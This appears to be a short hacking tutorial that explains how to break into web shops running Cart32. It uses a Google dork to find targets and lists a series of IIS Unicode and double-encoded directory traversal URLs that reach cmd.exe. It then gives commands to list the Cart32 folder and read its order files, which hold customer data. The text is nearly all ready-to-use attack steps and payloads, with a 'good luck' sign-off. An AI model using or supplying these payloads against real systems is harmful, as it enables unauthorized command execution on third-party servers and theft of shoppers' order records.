1. Find target at www.google.com with keyword allinurl:/cart32.exe/
2. For example we have target with url:
http://www.example.com/scripts/cart32.exe/blablabla
3. Replace that url to be -> http://www.example.com/scripts/
4. Modify that url with unicode at the end -> http://www.example.com/scripts/
/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
For path path /cgi-bin/ ->
/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
7. End string unicode with dir+c:\ It means we are on the directory c server target!
8. For enter to the directory replace cc's unicode with -> http://www.example.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\
9. We will get ouput and listing form.32 file'w, for example :WRBURNS-001065.c32
10. For viewing the file with unicode http://www.example.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+type+c:\progra~1\mwainc\cart32\WRBURNS-001065.c32
11. If it doesn't work, you have to try with another unicode.
12. Ok, Good luck...!
Leave Comment:
Post a Comment